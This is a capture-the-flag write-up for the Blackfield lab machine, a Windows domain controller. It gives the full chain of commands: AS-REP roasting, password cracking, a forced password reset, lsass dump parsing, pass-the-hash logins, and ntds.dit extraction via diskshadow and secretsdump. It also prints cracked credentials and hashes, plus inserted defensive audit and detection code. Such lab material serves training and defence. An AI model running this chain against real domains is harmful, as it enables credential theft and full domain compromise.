# Blackfield

## Nmap

```
nmap 10.10.10.192 -p- -sS -sV         

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-10 21:09:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

{% hint style="info" %}
Add "10.10.10.192 blackfield.local" to /etc/hosts.
{% endhint %}

Starting out, we run a large username list against Kerberos on port 88, which pulls out the known account name *<Support@blackfield.local>*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-42ce76f477f6227fccd5bb93e080e2c78eecaab8%2Fimage.png?alt=media)

With no further user accounts discovered we can check null credentials against SMB with `smbmap`.

```
smbmap -u null -p "" -H 10.10.10.192 -P 445 2>&1
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fee0301ab52d2f340762cbc7860b659cf0f4da47%2Fimage.png?alt=media)

We have some non-default shares. The `profiles$` share is of interest as we have *READ ONLY* access to it.

Using the smbclient command below, we can recursively download all files and folders in the share.

```
smbclient '\\10.10.10.192\profiles$' -N -c 'prompt OFF;recurse ON; mget *' 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-72566e18b3473c3eac31a5e03bbbf317b43c77c1%2Fimage.png?alt=media)

None of the directories appear to contain any files. We do, however, have folders named after potential users. Using this information we can write the directory list to a file.

```bash
# -mindepth 1 keeps the current directory "." itself out of the user list
find . -mindepth 1 -maxdepth 1 -type d -printf '%f\n' > users.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d2bbef4042c7cb510320719c397b1131cef5fe47%2Fimage.png?alt=media)

With kerbrute we can check which of these users exist.

```bash
python3 kerbrute.py -users '~/blackfield/users.txt' -domain 'blackfield.local' -dc-ip '10.10.10.192' -outputusers '~/known_users.txt'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-19db43faca636acc170308c1358a8add77b47c6f%2Fimage.png?alt=media)

We now have a confirmed user list:

```
svc_backup
audit2020
support
```

The user *support* has "Do not require Kerberos preauthentication" enabled in Active Directory. With this, we can potentially pull the account's AS-REP hash with Impacket's `GetNPUsers.py`.
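The setting abused here is a single bit in `userAccountControl`. As an added example (not part of the original writeup), the following audit decodes that attribute and lists enabled accounts with pre-authentication disabled; the records are constructed to mirror the Blackfield users, and `LDAP_FILTER` is the query a defender would run to pull the real ones.

```python
# Added example (not from the original writeup): audit userAccountControl for
# accounts that can be AS-REP roasted. The records below are constructed; in
# practice they would come from an LDAP search using LDAP_FILTER.
from typing import Dict, List

# Well-known userAccountControl bits (subset)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",  # "Do not require Kerberos preauthentication"
}

# LDAP bitwise-AND matching rule: any user object with DONT_REQ_PREAUTH set.
LDAP_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

def decode_uac(value: int) -> List[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def asrep_roastable(records: List[Dict]) -> List[str]:
    """Accounts with pre-auth disabled that are also enabled; the KDC will not
    issue an AS-REP for a disabled account, so those are skipped."""
    hits = []
    for rec in records:
        flags = decode_uac(rec["userAccountControl"])
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            hits.append(rec["sAMAccountName"])
    return hits

# Constructed sample data resembling the Blackfield user list.
SAMPLE_RECORDS = [
    {"sAMAccountName": "support",    "userAccountControl": 0x400200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10200},
    {"sAMAccountName": "audit2020",  "userAccountControl": 0x200},
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x400202},  # disabled
]

if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_RECORDS):
        print(f"{name}: pre-authentication not required")
```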

```
python2 GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -request -usersfile ~/known_users.txt -format john -outputfile ~/hashes.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aaf7a124cfc2b443dd0b8ac8ad6f95e7cce3b792%2Fimage.png?alt=media)

Reading the output file we see our confirmed hash for the *support* user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f89452929745af3464a7b0371657a75806bb915%2Fimage.png?alt=media)

```
$krb5asrep$support@BLACKFIELD.LOCAL:e4be5339949e37a4049a10b4a175f5e1$0a4606e9cc22be8bf26959b078d7d94703674c0df20808c3d93b2d09d0bacbaef84cc3b1fefd4384b545ce8d109b503db0e4705e4a94d0b8c681ec8a44cbdda2cadd94ea65c94f4e0ac956743ad3dbc2696cf5ad1fcb4aedc95bc8e5e7686311f7471a3455f59f422a4fa99b2850cdab872f065f680239ddc5007f2f1866d705808262203e50ccca81a32ffa1fbcdab215c29ada83678e4298a8ab92e1bf871ae507963f68453289a702bfa9df8ab2b4b73cc0cf07b95d4fb4c0f765f5b4712ce871eb9bd641e41df7efc7243b5e3cc8e92dcc2778c3b25756ebfbef86741840357839d0926f731a6d64bf335c3f675c237bc650
```

This can be cracked with `John` against the *rockyou.txt* password list.

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aec93f81d551a29e3d3e210c7df01288abb4787a%2Fimage.png?alt=media)

This reveals the user's password.

Credentials:

```
support:#00^BlackKnight
```

Checking with `crackmapexec` shows the credentials are valid.

```bash
crackmapexec smb '10.10.10.192' -u 'support' -p '#00^BlackKnight'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a62ce02b627b5507b6049a935ce46bde7cd36b3b%2Fimage.png?alt=media)

However, at this point we do not have code execution. We are not a member of "Remote Management Users" and RDP is not running.

What we can do, however, is use `bloodhound` to collect domain information remotely with BloodHound.py.

**GitHub:** <https://github.com/fox-it/BloodHound.py>

```bash
python2 bloodhound.py -u 'support' -p '#00^BlackKnight' -ns '10.10.10.192' -d 'blackfield.local' -gc 'dc01.blackfield.local'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84a413e410a5ab41c8b7aec7342bb722c2d4ae51%2Fimage.png?alt=media)

After uploading the results to BloodHound we further investigate our currently owned user *support*. Looking at the node information we see we have the "ForceChangePassword" right over the user *Audit2020*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d8e917a5be27fd4b008faa7a3522cec06de00ea1%2Fimage.png?alt=media)

We can force a password change externally with rpcclient as shown below.

```bash
# Syntax: setuserinfo2 <username> <level> <password> [password_expired]
rpcclient -U support //10.10.10.192
# At the rpcclient prompt, level 23 sets the password:
setuserinfo2 audit2020 23 'Password123'
```

After the password change we can confirm the credentials with `crackmapexec`.

```bash
crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'Password123' --shares
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6337f50e326b2d820b39c2dd426b6f58cea4a2e7%2Fimage.png?alt=media)

From our previous findings we know that a forensic SMB share exists. The user *audit2020* has access to the share.

```bash
smbclient -U 'audit2020' '\\10.10.10.192\forensic'  -c 'prompt OFF;recurse ON; mget *' 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b4672d2b2f3422cbc1c1c7b227635856b7f383f%2Fimage.png?alt=media)

Looking inside the memory\_analysis folder, the file that stands out most is lsass.dmp. Hopefully we can pull some user hashes or passwords from it.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3b03f4891581d4dc8a85a2fd1557def20f7a17c4%2Fimage.png?alt=media)

`lsass.dmp` is a minidump of the LSASS process. The best dedicated tool for this is likely `pypykatz`.

**Github:** <https://github.com/skelsec/pypykatz>

**Install**

```bash
# Clone repo
git clone https://github.com/skelsec/pypykatz.git
# Install
pip3 install pypykatz
```

The following syntax can be used to analyse the `lsass.dmp` file.

```bash
pypykatz lsa minidump '~/blackfield/memory_analysis/lsass.DMP'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d959c14cab8d80381dfa1b54d1b9087482689978%2Fimage.png?alt=media)

As shown above we can see the NT hash for the account *svc\_backup*.

As we know from earlier enumeration, this user is a member of the "Remote Management Users" group. As such, we can use `Evil-WinRM` to login with the account hash.

```bash
evil-winrm -i '10.10.10.192' -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-88cf62af32a064c1263919a269e4b970eb098e2f%2Fimage.png?alt=media)

We know this account is already a member of the "Backup Operators" group. Let's double check that we have the "SeBackupPrivilege" privilege assigned so we can perform privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1c26a6e229ff117b12fd6598a21013c98cf496cb%2Fimage.png?alt=media)

This privilege grants us the ability to create backups of files on the system. Knowing this, a high-value file is `ntds.dit`, the Active Directory database holding domain objects and user password hashes. As ntds.dit is in constant use, we cannot copy it with normal methods because the system keeps the file locked.

What we can do instead is create a **Distributed Shell File** (DSH). This file will contain the appropriate commands for us to run the diskshadow utility against the C: drive and ultimately, the ntds.dit file.

I have covered this technique previously, as linked below.

{% content-ref url="../../tryhackme/linux/fusion-corp" %}
[fusion-corp](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/fusion-corp)
{% endcontent-ref %}

First, create a file called `viper.dsh` on the attacking machine with the following contents:

```
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:
```

Once done, use `unix2dos` to convert the file to DOS line endings.

```
unix2dos viper.dsh
```

Then, on the target system, create the directory `c:\temp` and upload the `viper.dsh` file there.

From here run the following commands:

```
diskshadow /s viper.dsh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35e197ebacde0d1eed1fbda10a6dffc95f4d0638%2Fimage.png?alt=media)

```
robocopy /b x:\windows\ntds . ntds.dit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2626efb3d288248630a1477114bdceb349e4a109%2Fimage.png?alt=media)

From here we need to extract the SYSTEM hive which will be required for extracting the hashes with Impacket later.

```
reg save hklm\system c:\Temp\system
```

From here we can use Evil-WinRM's `download` command to retrieve the `ntds.dit` and `system` hive files.

```
download ntds.dit
download system
```
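Every step of this chain leaves a process-creation or privilege event on the domain controller. As an added example (not part of the original writeup), the detector below runs simple rules over constructed Windows Security events shaped like 4688 (process creation with command-line auditing enabled) and 4672 (special privileges assigned), and only reports an account once it trips more than one rule, so a routine Backup Operators logon alone does not alert.

```python
# Added example (not from the original writeup): detect the SeBackupPrivilege /
# diskshadow / ntds.dit chain in Windows Security events. Events are constructed
# dicts carrying the relevant fields of 4688 and 4672.
import re
from collections import defaultdict
from typing import Dict, List

# (event id, regex over the relevant field, reason)
RULES = [
    (4688, re.compile(r"diskshadow(\.exe)?\s+/s\b", re.I), "scripted diskshadow run"),
    (4688, re.compile(r"robocopy.*\s/b\b.*ntds", re.I), "backup-mode copy of ntds.dit"),
    (4688, re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I), "SYSTEM hive export"),
    (4672, re.compile(r"SeBackupPrivilege", re.I), "SeBackupPrivilege granted at logon"),
]

def match_event(ev: Dict) -> List[str]:
    """Reasons one event trips: 4688 is matched on CommandLine, 4672 on PrivilegeList."""
    field = ev.get("CommandLine", "") if ev["EventID"] == 4688 else ev.get("PrivilegeList", "")
    return [why for eid, rx, why in RULES if eid == ev["EventID"] and rx.search(field)]

def flag_backup_abuse(events: List[Dict], min_hits: int = 2) -> Dict[str, List[str]]:
    """Group distinct rule hits per account; report accounts with at least min_hits,
    so a lone backup-operator logon (4672) does not page anyone."""
    hits = defaultdict(list)
    for ev in events:
        for why in match_event(ev):
            if why not in hits[ev["SubjectUserName"]]:
                hits[ev["SubjectUserName"]].append(why)
    return {user: whys for user, whys in hits.items() if len(whys) >= min_hits}

# Constructed events mirroring the steps above, plus a benign backup-operator logon.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "svc_backup", "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4688, "SubjectUserName": "svc_backup", "CommandLine": "diskshadow /s viper.dsh"},
    {"EventID": 4688, "SubjectUserName": "svc_backup", "CommandLine": "robocopy /b x:\\windows\\ntds . ntds.dit"},
    {"EventID": 4688, "SubjectUserName": "svc_backup", "CommandLine": "reg save hklm\\system c:\\Temp\\system"},
    {"EventID": 4672, "SubjectUserName": "backupsvc", "PrivilegeList": "SeBackupPrivilege"},
    {"EventID": 4688, "SubjectUserName": "backupsvc", "CommandLine": "wbadmin start backup -backupTarget:E:"},
]

if __name__ == "__main__":
    for user, reasons in flag_backup_abuse(SAMPLE_EVENTS).items():
        print(f"{user}: {', '.join(reasons)}")
```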

Now, over on the attacking system we can use Impacket's `secretsdump.py` to extract the domain account hashes.

```bash
python2 'secretsdump.py' -ntds 'ntds.dit' -system 'system' local 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5c4b99546134cbb74bbb78a8f63811a2200a1b0%2Fimage.png?alt=media)

With the administrator's NTLM hash we can log into the Domain Controller with `Evil-WinRM`.

```bash
evil-winrm -i '10.10.10.192' -u 'administrator' -H '184fb5e5178480be64824d4cd53b99ee'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ded1405dbd763194d6816175ff1b2cab91bcc72a%2Fimage.png?alt=media)
